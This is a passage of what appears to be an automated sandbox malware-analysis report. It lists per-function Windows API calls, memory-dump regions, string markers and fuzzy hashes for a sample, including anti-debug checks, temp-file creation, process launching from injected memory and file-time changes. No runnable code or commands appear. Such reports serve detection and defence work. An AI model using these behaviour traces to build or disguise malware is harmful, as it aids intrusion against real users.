• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: 9db5e3c1d3cead324951d0734f82582c999b34a7775e48dca10745d79e36121f
• Instruction ID: 91b9bc2a630325d0e4a63ae2986c1f1f269d4d2f2bcdb44ff7bd7fe571590b31
• Opcode Fuzzy Hash: 9db5e3c1d3cead324951d0734f82582c999b34a7775e48dca10745d79e36121f
• Instruction Fuzzy Hash: 8521C670A0028C9BDF419F94DC45BEE7BF9AF49710F004019E548F7241DBB859899FA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: f0ab55b3ca402d12f1d24723354217d45de6e5495e6dfc64564e904c5b22669c
• Instruction ID: 4c380f69228651a9cc167196fc936431d6ef10dec9356ffd75fdceb4020ed2dc
• Opcode Fuzzy Hash: f0ab55b3ca402d12f1d24723354217d45de6e5495e6dfc64564e904c5b22669c
• Instruction Fuzzy Hash: BB01B972D042187EDB18CAA8CC56EFE7BFCDB15711F00459AF552D21C1E9B9E604AB60
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 014403BD
• ExitProcess.KERNEL32(00000000), ref: 014403DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: Process$CreateExit
• String ID: D
• API String ID: 126409537-2746444292
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00F498F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F4990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F00193
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F0019B
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F001A6
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F001B1
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F001B9
  • Part of subcall function 00F00162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F001C1
  • Part of subcall function 00EF60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EEF930), ref: 00EF6154
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EEF9CD
• OleInitialize.OLE32(00000000), ref: 00EEFA4A
• CloseHandle.KERNEL32(00000000), ref: 00F245C8
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
APIs
• _memset.LIBCMT ref: 00EE4370
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EE4415
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE4432
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
APIs
• __FF_MSGBANNER.LIBCMT ref: 00F05733
  • Part of subcall function 00F0A16B: __NMSG_WRITE.LIBCMT ref: 00F0A192
  • Part of subcall function 00F0A16B: __NMSG_WRITE.LIBCMT ref: 00F0A19C
• __NMSG_WRITE.LIBCMT ref: 00F0573A
  • Part of subcall function 00F0A1C8: GetModuleFileNameW.KERNEL32(00000000,00FA33BA,00000104,?,00000001,00000000), ref: 00F0A25A
  • Part of subcall function 00F0A1C8: ___crtMessageBoxW.LIBCMT ref: 00F0A308
  • Part of subcall function 00F0309F: ___crtCorExitProcess.LIBCMT ref: 00F030A5
  • Part of subcall function 00F0309F: ExitProcess.KERNEL32 ref: 00F030AE
  • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
• RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F49548,?,?,?,?,?,00000004), ref: 00F498BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F49548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F498D1
• CloseHandle.KERNEL32(00000000,?,00F49548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F498D8
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 00F48D1B
  • Part of subcall function 00F02D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F09A24), ref: 00F02D69
  • Part of subcall function 00F02D55: GetLastError.KERNEL32(00000000,?,00F09A24), ref: 00F02D7B
• _free.LIBCMT ref: 00F48D2C
• _free.LIBCMT ref: 00F48D3E
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
                                                                                                                            • Opcode ID: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                            • Instruction ID: c720a0bc9d863eb5c1f48f59a03d83235a55dc065651d2243e1f411ece1928a0
                                                                                                                            • Opcode Fuzzy Hash: bee81b5e5e3cd578fde5cdb6867b4e945c3d38cd80081bd24aec34fd9e465f35
                                                                                                                            • Instruction Fuzzy Hash: CFE012A1E0361146CF64A5B8BD44A9767EC4F5C7A2754091DBC0DD71C6CE68FC83B134
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CALL
                                                                                                                            • API String ID: 0-4196123274
                                                                                                                            • Opcode ID: cca8ba5c4a2308a9fe6efbb4b0495a0fe481d99777616e3a01bb2f51fbab88d5
                                                                                                                            • Instruction ID: 32e0927115fca1dcd81f0ddce90f98ca802aaa81a7483493d85b42d4d2cd666d
                                                                                                                            • Opcode Fuzzy Hash: cca8ba5c4a2308a9fe6efbb4b0495a0fe481d99777616e3a01bb2f51fbab88d5
                                                                                                                            • Instruction Fuzzy Hash: CE227C70508385DFC724DF15C490B6AB7E1BF84304F19996DE88AAB362DB35EC85DB82
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: EA06
                                                                                                                            • API String ID: 4104443479-3962188686
                                                                                                                            • Opcode ID: 4ab294760f2c548670d06509f707ade76e86b5a72f2ed4a3fc11390276e8fe85
                                                                                                                            • Instruction ID: afad0c59b6b54fc8500625da94b3ca60d2c7c8dcc868d8874f35cefdd62f56db
                                                                                                                            • Opcode Fuzzy Hash: 4ab294760f2c548670d06509f707ade76e86b5a72f2ed4a3fc11390276e8fe85
                                                                                                                            • Instruction Fuzzy Hash: B9415AA2A041DC5BDF229B669C617FE7FF29B45304F286465EC82BB3C2D6209D44D3A1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                                                                            • Instruction ID: da54b46ed4f4733f80cd02f0f4e4149adead8fe919d093d99dbce339426910be
                                                                                                                            • Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                                                                            • Instruction Fuzzy Hash: 8F31D6B160460AAFC704DF69C8D1E69F3A9FF48320B148629E559CB391EF30ED60CB90
                                                                                                                            APIs
                                                                                                                            • IsThemeActive.UXTHEME ref: 00EE4834
                                                                                                                              • Part of subcall function 00F0336C: __lock.LIBCMT ref: 00F03372
                                                                                                                              • Part of subcall function 00F0336C: DecodePointer.KERNEL32(00000001,?,00EE4849,00F37C74), ref: 00F0337E
                                                                                                                              • Part of subcall function 00F0336C: EncodePointer.KERNEL32(?,?,00EE4849,00F37C74), ref: 00F03389
                                                                                                                              • Part of subcall function 00EE48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EE4915
                                                                                                                              • Part of subcall function 00EE48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE492A
                                                                                                                              • Part of subcall function 00EE3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EE3B68
                                                                                                                              • Part of subcall function 00EE3B3A: IsDebuggerPresent.KERNEL32 ref: 00EE3B7A
                                                                                                                              • Part of subcall function 00EE3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA52F8,00FA52E0,?,?), ref: 00EE3BEB
                                                                                                                              • Part of subcall function 00EE3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00EE3C6F
                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE4874
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1438897964-0
                                                                                                                            • Opcode ID: 7f3916448f20ee98278f699069dbd68c3eff758e3fbcb093f38101ddc6a0d8e2
                                                                                                                            • Instruction ID: 2355444fc535d1a381df12408fa646ca3a2162ac6f8dee297f2881379d8aaeff
                                                                                                                            • Opcode Fuzzy Hash: 7f3916448f20ee98278f699069dbd68c3eff758e3fbcb093f38101ddc6a0d8e2
                                                                                                                            • Instruction Fuzzy Hash: 8C1190B19083899FC700DF3AEC4594ABBE8EF8A750F10451EF444932B2DBB09548EB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F0571C: __FF_MSGBANNER.LIBCMT ref: 00F05733
                                                                                                                              • Part of subcall function 00F0571C: __NMSG_WRITE.LIBCMT ref: 00F0573A
                                                                                                                              • Part of subcall function 00F0571C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00F00DEC
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00F00E01
                                                                                                                              • Part of subcall function 00F0859B: RaiseException.KERNEL32(?,?,?,00F99E78,00000000,?,?,?,?,00F00E06,?,00F99E78,?,00000001), ref: 00F085F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3902256705-0
                                                                                                                            • Opcode ID: 8c44aad94a3496e46065025a3147dccd0752f7800f1485c4de1208193c633970
                                                                                                                            • Instruction ID: 8882f56da610e2387c601223635356d36d76494718ad6c6b32a2586532ec2744
                                                                                                                            • Opcode Fuzzy Hash: 8c44aad94a3496e46065025a3147dccd0752f7800f1485c4de1208193c633970
                                                                                                                            • Instruction Fuzzy Hash: C8F0CD3590031E66DB10FA98EC01ADF77ACDF01361F104416FD48A61C1DFB49A41F5E1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_file_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 26237723-0
                                                                                                                            • Opcode ID: 64db0f15f73397b8ac89521d576ff217640f3e27d6e7dc142dc7a4591c538bce
                                                                                                                            • Instruction ID: e9a9cd1559ac2bd4691a265d5f801f4d4f69e2d636a4fecaf608cd49fffd3b78
                                                                                                                            • Opcode Fuzzy Hash: 64db0f15f73397b8ac89521d576ff217640f3e27d6e7dc142dc7a4591c538bce
                                                                                                                            • Instruction Fuzzy Hash: A901F771C01A08EBCF12AF64CC0299F7B61AF91B61F444215F8141B1D1DBBA8A12FF91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F08B28: __getptd_noexit.LIBCMT ref: 00F08B28
                                                                                                                            • __lock_file.LIBCMT ref: 00F053EB
                                                                                                                              • Part of subcall function 00F06C11: __lock.LIBCMT ref: 00F06C34
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00F053F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: f48f0a3f6d9725d79f464e283d339054befcfdf927c81e7c44a6bea1cd3b2610
                                                                                                                            • Instruction ID: 085eeb101c88687b1893ee5d26c80ae94aa766a589707f0443c9ee02311983b0
                                                                                                                            • Opcode Fuzzy Hash: f48f0a3f6d9725d79f464e283d339054befcfdf927c81e7c44a6bea1cd3b2610
                                                                                                                            • Instruction Fuzzy Hash: B4F09671801A049ADB11BB659C027AE76A16F41BB5F258204A464AB1C1CBFC8942BF62
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0143FC58: GetFileAttributesW.KERNELBASE(?), ref: 0143FC63
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 01440517
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile
• String ID:
• API String ID: 3401506121-0
• Opcode ID: 770e766502ed02b66cd14dd4eff8910109c67dfbe528b1a34708041390655a8e
• Instruction ID: ded737f6cf2c2abc2fce56558c6318e0ce81cd864262d051aabc706d40cf548e
• Opcode Fuzzy Hash: 770e766502ed02b66cd14dd4eff8910109c67dfbe528b1a34708041390655a8e
• Instruction Fuzzy Hash: 31519631A1020D97EF14EFA4C954BEF7379EF58700F0045A9A60DE7290EB35AB45CBA5
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 8d683d327b28034ccf8b9f8063029d1c5d65379e7434f1e7d2f55596e96dcf99
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: B631A171A00105DBE718DF58C484A69F7A6FB59310F68C6A9E80ACB395DA31EDC1FB80
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 96baf8e559380fa93e7010f7ebba9dded5c8e6bf2b941d505f771d9d82c89c56
• Instruction ID: a0e2b41dfaf57507b0eee0aedbf48c7a0a88a99805cfcc6f1e9d271884843475
• Opcode Fuzzy Hash: 96baf8e559380fa93e7010f7ebba9dded5c8e6bf2b941d505f771d9d82c89c56
• Instruction Fuzzy Hash: EA414774604345CFDB24CF14C444B1ABBE1BF45318F1988ACE8999B362C731E849DF42
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
